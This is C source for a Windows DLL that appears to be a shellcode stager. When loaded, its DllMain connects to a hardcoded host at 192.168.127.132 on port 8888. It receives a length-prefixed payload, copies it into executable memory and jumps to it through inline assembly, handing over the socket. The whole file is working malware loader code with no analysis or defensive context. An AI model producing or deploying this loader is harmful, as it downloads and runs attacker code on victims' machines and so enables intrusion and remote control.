#include "Windows.h" #include <WinSock2.h> #include <stdio.h> #pragma comment(lib,"WS2_32.lib") int shellcode_execute() { WSADATA wsData; if(WSAStartup(MAKEWORD(2,2),&wsData)) { printf("WSAStartp fail. "); return 0; } SOCKET sock = WSASocket(AF_INET,SOCK_STREAM,0,0,0,0); SOCKADDR_IN server; ZeroMemory(&server,sizeof(SOCKADDR_IN)); server.sin_family = AF_INET; server.sin_addr.s_addr = inet_addr("192.168.127.132"); //server ip server.sin_port = htons(8888); //server port if(SOCKET_ERROR == connect(sock,(SOCKADDR*)&server,sizeof(server))) { printf("connect to server fail. "); closesocket(sock); WSACleanup(); return 0; } u_int payloadLen; if (recv(sock,(char*)&payloadLen,sizeof(payloadLen),0) != sizeof(payloadLen)) { printf("recv error "); closesocket(sock); WSACleanup(); return 0; } char* orig_buffer = (char*)VirtualAlloc(NULL,payloadLen,MEM_COMMIT,PAGE_EXECUTE_READWRITE); char* buffer = orig_buffer; int ret = 0; do { ret = recv(sock,buffer,payloadLen,0); buffer += ret; payloadLen -= ret; } while (ret > 0 && payloadLen > 0); //执行shellcode __asm { mov edi,sock; jmp orig_buffer; } VirtualFree(orig_buffer,0,MEM_RELEASE); } BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: shellcode_execute(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }